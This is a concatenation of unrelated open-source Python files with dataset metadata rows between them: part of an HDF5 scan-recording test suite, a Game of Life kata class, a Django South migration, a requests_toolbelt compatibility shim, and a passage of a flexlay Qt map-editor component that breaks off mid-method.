# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
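    # Unlike test_scanRecordGrow3 this variant records self._image1/self._image2;
    # the checks below expect constant int64 fill values (0 and
    # 9223372036854775807) instead of the image data and six attributes on the
    # image field.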
def test_scanRecordGrow4(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1, self._image2]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2, self._image1]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
            self.assertEqual(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 200, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 160000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[3][i][j])
self.assertEqual(len(mca.attributes), 6)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
            self.assertTrue(hasattr(mca.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 200, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 160000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[3][i][j])
self.assertEqual(len(mca.attributes), 6)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,483,284,254,181,963,300 | 40.044458 | 79 | 0.535316 | false | 3.876787 | false | false | false |
hemmerling/codingdojo | src/game_of_life/python_coderetreat_berlin_2014-09/python_legacycrberlin02/gol02.py | 1 | 1049 | 2#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Administrator
#
# Created: 08/10/2011
# Copyright: (c) Administrator 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
class Gol02:
def __init__(self):
self.numberOfNeighbors = 0
self.isAlive = False
self.board = []
pass
def evolve(self):
return
def setAlive(self):
self.isAlive = True
def isLiving(self):
result = ( self.numberOfNeighbors == 3 ) or \
(self.isAlive and self.numberOfNeighbors == 2)
return result
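    # Usage sketch of the rule encoded above (a cell with exactly three
    # neighbours counts as living):
    #
    #     cell = Gol02()
    #     cell.addNeigbors(3)
    #     assert cell.isLiving()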
def addNeigbors(self, numberOfNeighbors):
self.numberOfNeighbors = numberOfNeighbors
return
    def appendNeigbors(self, neighbor):
self.board.append(neighbor)
self.numberOfNeighbors +=1
if __name__ == '__main__':
pass | apache-2.0 | 3,356,558,385,341,113,300 | 24.275 | 81 | 0.467112 | false | 4.444915 | false | false | false |
ojii/gitstats.ep.io | src/stats/migrations/0001_initial.py | 1 | 1658 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Repository'
db.create_table('stats_repository', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=50)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50, db_index=True)),
('repourl', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('stats', ['Repository'])
def backwards(self, orm):
# Deleting model 'Repository'
db.delete_table('stats_repository')
models = {
'stats.repository': {
'Meta': {'ordering': "['name']", 'object_name': 'Repository'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'repourl': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['stats']
| bsd-3-clause | -6,306,751,295,875,368,000 | 41.512821 | 122 | 0.583836 | false | 3.725843 | false | false | false |
search5/nanumlectures | lib/requests_toolbelt/_compat.py | 17 | 9464 | """Private module full of compatibility hacks.
Primarily this is for downstream redistributions of requests that unvendor
urllib3 without providing a shim.
.. warning::
This module is private. If you use it, and something breaks, you were
    warned.
"""
try:
    from collections.abc import Mapping, MutableMapping
except ImportError:  # Python 2
    from collections import Mapping, MutableMapping
import sys
import requests
try:
from requests.packages.urllib3 import fields
from requests.packages.urllib3 import filepost
from requests.packages.urllib3 import poolmanager
except ImportError:
from urllib3 import fields
from urllib3 import filepost
from urllib3 import poolmanager
try:
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3 import connection
except ImportError:
try:
from urllib3.connection import HTTPConnection
from urllib3 import connection
except ImportError:
HTTPConnection = None
connection = None
if requests.__build__ < 0x020300:
timeout = None
else:
try:
from requests.packages.urllib3.util import timeout
except ImportError:
from urllib3.util import timeout
if requests.__build__ < 0x021000:
gaecontrib = None
else:
try:
from requests.packages.urllib3.contrib import appengine as gaecontrib
except ImportError:
from urllib3.contrib import appengine as gaecontrib
PY3 = sys.version_info > (3, 0)
if PY3:
import queue
from urllib.parse import urlencode, urljoin
else:
import Queue as queue
from urllib import urlencode
from urlparse import urljoin
try:
basestring = basestring
except NameError:
basestring = (str, bytes)
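# A minimal usage sketch (assuming requests_toolbelt is importable as a
# package): downstream code pulls the urllib3 pieces from this module instead
# of guessing where requests keeps its vendored copy, e.g.
#
#     from requests_toolbelt._compat import HTTPHeaderDict, urljoin
#
#     headers = HTTPHeaderDict()
#     headers.add('Set-Cookie', 'foo=bar')
#     headers.add('set-cookie', 'baz=quxx')
#     assert headers['SET-cookie'] == 'foo=bar, baz=quxx'
#     assert urljoin('http://example.com/a/', 'b') == 'http://example.com/a/b'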
class HTTPHeaderDict(MutableMapping):
"""
:param headers:
An iterable of field-value pairs. Must not contain multiple field names
when compared case-insensitively.
:param kwargs:
Additional field-value pairs to pass in to ``dict.update``.
A ``dict`` like container for storing HTTP Headers.
Field names are stored and compared case-insensitively in compliance with
RFC 7230. Iteration provides the first case-sensitive key seen for each
case-insensitive pair.
Using ``__setitem__`` syntax overwrites fields that compare equal
case-insensitively in order to maintain ``dict``'s api. For fields that
compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
in a loop.
If multiple fields that are equal case-insensitively are passed to the
constructor or ``.update``, the behavior is undefined and some will be
lost.
>>> headers = HTTPHeaderDict()
>>> headers.add('Set-Cookie', 'foo=bar')
>>> headers.add('set-cookie', 'baz=quxx')
>>> headers['content-length'] = '7'
>>> headers['SET-cookie']
'foo=bar, baz=quxx'
>>> headers['Content-Length']
'7'
"""
def __init__(self, headers=None, **kwargs):
super(HTTPHeaderDict, self).__init__()
self._container = {}
if headers is not None:
if isinstance(headers, HTTPHeaderDict):
self._copy_from(headers)
else:
self.extend(headers)
if kwargs:
self.extend(kwargs)
def __setitem__(self, key, val):
self._container[key.lower()] = (key, val)
return self._container[key.lower()]
def __getitem__(self, key):
val = self._container[key.lower()]
return ', '.join(val[1:])
def __delitem__(self, key):
del self._container[key.lower()]
def __contains__(self, key):
return key.lower() in self._container
def __eq__(self, other):
if not isinstance(other, Mapping) and not hasattr(other, 'keys'):
return False
if not isinstance(other, type(self)):
other = type(self)(other)
return (dict((k.lower(), v) for k, v in self.itermerged()) ==
dict((k.lower(), v) for k, v in other.itermerged()))
def __ne__(self, other):
return not self.__eq__(other)
if not PY3: # Python 2
iterkeys = MutableMapping.iterkeys
itervalues = MutableMapping.itervalues
__marker = object()
def __len__(self):
return len(self._container)
def __iter__(self):
# Only provide the originally cased names
for vals in self._container.values():
yield vals[0]
def pop(self, key, default=__marker):
"""D.pop(k[,d]) -> v, remove specified key and return its value.
If key is not found, d is returned if given, otherwise KeyError is
raised.
"""
# Using the MutableMapping function directly fails due to the private
# marker.
# Using ordinary dict.pop would expose the internal structures.
# So let's reinvent the wheel.
try:
value = self[key]
except KeyError:
if default is self.__marker:
raise
return default
else:
del self[key]
return value
def discard(self, key):
try:
del self[key]
except KeyError:
pass
def add(self, key, val):
"""Adds a (name, value) pair, doesn't overwrite the value if it already
exists.
>>> headers = HTTPHeaderDict(foo='bar')
>>> headers.add('Foo', 'baz')
>>> headers['foo']
'bar, baz'
"""
key_lower = key.lower()
new_vals = key, val
# Keep the common case aka no item present as fast as possible
vals = self._container.setdefault(key_lower, new_vals)
if new_vals is not vals:
# new_vals was not inserted, as there was a previous one
if isinstance(vals, list):
# If already several items got inserted, we have a list
vals.append(val)
else:
# vals should be a tuple then, i.e. only one item so far
# Need to convert the tuple to list for further extension
self._container[key_lower] = [vals[0], vals[1], val]
def extend(self, *args, **kwargs):
"""Generic import function for any type of header-like object.
Adapted version of MutableMapping.update in order to insert items
with self.add instead of self.__setitem__
"""
if len(args) > 1:
raise TypeError("extend() takes at most 1 positional "
"arguments ({} given)".format(len(args)))
other = args[0] if len(args) >= 1 else ()
if isinstance(other, HTTPHeaderDict):
for key, val in other.iteritems():
self.add(key, val)
elif isinstance(other, Mapping):
for key in other:
self.add(key, other[key])
elif hasattr(other, "keys"):
for key in other.keys():
self.add(key, other[key])
else:
for key, value in other:
self.add(key, value)
for key, value in kwargs.items():
self.add(key, value)
def getlist(self, key):
"""Returns a list of all the values for the named field. Returns an
empty list if the key doesn't exist."""
try:
vals = self._container[key.lower()]
except KeyError:
return []
else:
if isinstance(vals, tuple):
return [vals[1]]
else:
return vals[1:]
# Backwards compatibility for httplib
getheaders = getlist
getallmatchingheaders = getlist
iget = getlist
def __repr__(self):
return "%s(%s)" % (type(self).__name__, dict(self.itermerged()))
def _copy_from(self, other):
for key in other:
val = other.getlist(key)
if isinstance(val, list):
# Don't need to convert tuples
val = list(val)
self._container[key.lower()] = [key] + val
def copy(self):
clone = type(self)()
clone._copy_from(self)
return clone
def iteritems(self):
"""Iterate over all header lines, including duplicate ones."""
for key in self:
vals = self._container[key.lower()]
for val in vals[1:]:
yield vals[0], val
def itermerged(self):
"""Iterate over all headers, merging duplicate ones together."""
for key in self:
val = self._container[key.lower()]
yield val[0], ', '.join(val[1:])
def items(self):
return list(self.iteritems())
@classmethod
def from_httplib(cls, message): # Python 2
"""Read headers from a Python 2 httplib message object."""
# python2.7 does not expose a proper API for exporting multiheaders
# efficiently. This function re-reads raw lines from the message
# object and extracts the multiheaders properly.
headers = []
for line in message.headers:
if line.startswith((' ', '\t')):
key, value = headers[-1]
headers[-1] = (key, value + '\r\n' + line.rstrip())
continue
key, value = line.split(':', 1)
headers.append((key, value.strip()))
return cls(headers)
__all__ = (
'basestring',
'connection',
'fields',
'filepost',
'poolmanager',
'timeout',
'HTTPHeaderDict',
'queue',
'urlencode',
'gaecontrib',
'urljoin',
)
| apache-2.0 | -1,728,486,609,376,456,400 | 29.529032 | 79 | 0.588123 | false | 4.325411 | false | false | false |
Karkus476/flexlay | flexlay/gui/editor_map_component.py | 1 | 7602 | # Flexlay - A Generic 2D Game Editor
# Copyright (C) 2014 Ingo Ruhnke <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pickle
from PyQt4.QtCore import Qt
from PyQt4.QtGui import (QWidget, QGridLayout, QScrollBar, QTabWidget,
QKeySequence, QShortcut, QCursor)
from flexlay.graphic_context_state import GraphicContextState
from flexlay.math import Pointf
from flexlay.util import Signal
from flexlay.workspace import Workspace
from .editor_map_widget import EditorMapWidget
from .object_selector import ObjectSelector
class EditorMapComponent:
current = None
def __init__(self, tabbed=True, parent=None):
EditorMapComponent.current = self
self.workspace = Workspace()
self.gc_state = GraphicContextState()
if tabbed:
self.tab_widget = QTabWidget(parent)
self.widget = QWidget(self.tab_widget)
self.tab_widget.addTab(self.widget, "A Label")
else:
self.tab_widget = None
self.widget = QWidget(parent)
self.layout = QGridLayout(self.widget)
self.layout.setContentsMargins(0, 0, 0, 0)
self.layout.setHorizontalSpacing(0)
self.layout.setVerticalSpacing(0)
self.scroll_horz = QScrollBar(Qt.Horizontal)
self.scroll_vert = QScrollBar(Qt.Vertical)
self.editormap_widget = EditorMapWidget(self, None)
self.scroll_horz.valueChanged.connect(self.move_to_x)
self.scroll_vert.valueChanged.connect(self.move_to_y)
self.layout.addWidget(self.editormap_widget, 0, 0)
self.layout.addWidget(self.scroll_horz, 1, 0)
self.layout.addWidget(self.scroll_vert, 0, 1)
self.sig_drop = Signal()
self.editormap_widget.sig_drop.connect(self.on_drop)
def on_drop(self, data, pos):
"""sends (brush, pos)"""
brush_id = pickle.loads(data)
brush = ObjectSelector.current.get_brush(brush_id)
return self.sig_drop(brush, pos)
def get_workspace(self):
return self.workspace
def grab_mouse(self):
self.editormap_widget.grabMouse()
def release_mouse(self):
self.editormap_widget.releaseMouse()
# ifdef GRUMBEL
# void
# EditorMapComponentImpl::on_key_down(const CL_InputEvent& event)
# {
# if (event.id >= 0 && event.id < 256)
# {
# Rect rect = parent.get_position()
# key_bindings[event.id](CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# }
# if (event.repeat_count == 0)
# {
# Rect rect = parent.get_position()
# CL_InputEvent ev2 = event
# ev2.mouse_pos = Point(CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# workspace.key_down(InputEvent(ev2))
# }
# }
# void
# EditorMapComponentImpl::on_key_up(const CL_InputEvent& event)
# {
# Rect rect = parent.get_position()
# CL_InputEvent ev2 = event
# ev2.mouse_pos = Point(CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# workspace.key_up(InputEvent(ev2))
# }
# void
# EditorMapComponentImpl::draw ()
# {
# if (workspace.get_map().is_null()) return
# Display::push_cliprect(parent.get_screen_rect())
# Display::push_modelview()
# Display::add_translate(parent.get_screen_x(), parent.get_screen_y())
# // Update scrollbars (FIXME: move me to function)
# scrollbar_v.set_range(0, workspace.get_map().get_bounding_rect().height)
# scrollbar_v.set_pagesize(parent.height/gc_state.get_zoom())
# scrollbar_v.set_pos(gc_state.get_pos().y)
# scrollbar_h.set_range(0, workspace.get_map().get_bounding_rect().width)
# scrollbar_h.set_pagesize(parent.width/gc_state.get_zoom())
# scrollbar_h.set_pos(gc_state.get_pos().x)
# gc_state.push()
# {
# GraphicContext gc(gc_state, CL_Display::get_current_window().get_gc())
# workspace.draw(gc)
# }
# gc_state.pop()
# Display::pop_modelview()
# Display::pop_cliprect()
# }
# endif
def screen2world(self, pos):
return self.gc_state.screen2world(pos)
def set_zoom(self, z):
self.gc_state.set_zoom(z)
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_out(self, pos):
self.gc_state.set_zoom(self.gc_state.get_zoom() / 1.25,
Pointf(pos.x, pos.y))
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_in(self, pos):
self.gc_state.set_zoom(self.gc_state.get_zoom() * 1.25,
Pointf(pos.x, pos.y))
self.editormap_widget.repaint()
self.update_scrollbars()
def zoom_to(self, rect):
self.gc_state.zoom_to(rect)
self.editormap_widget.repaint()
self.update_scrollbars()
def get_clip_rect(self):
return self.gc_state.get_clip_rect()
def move_to(self, x, y):
self.gc_state.set_pos(Pointf(x, y))
self.editormap_widget.repaint()
self.update_scrollbars()
def move_to_x(self, x):
self.gc_state.set_pos(Pointf(x, self.gc_state.get_pos().y))
self.editormap_widget.repaint()
self.update_scrollbars()
def move_to_y(self, y):
self.gc_state.set_pos(Pointf(self.gc_state.get_pos().x, y))
self.editormap_widget.repaint()
self.update_scrollbars()
def sig_on_key(self, keyseq_str):
key_sequence = QKeySequence(keyseq_str)
if key_sequence.isEmpty():
raise RuntimeError("invalid key binding: '%s'" % keyseq_str)
shortcut = QShortcut(key_sequence, self.editormap_widget)
signal = Signal()
def on_key(*args):
pos = self.editormap_widget.mapFromGlobal(QCursor.pos())
# pos = self.gc_state.screen2world(Point.from_qt(pos))
signal(pos.x(), pos.y())
shortcut.activated.connect(on_key)
return signal
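    # Usage sketch for sig_on_key (assuming flexlay.util.Signal provides
    # connect(), as the sig_drop wiring above suggests):
    #
    #     EditorMapComponent.current.sig_on_key("F5").connect(
    #         lambda x, y: print("key pressed at", x, y))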
def get_gc_state(self):
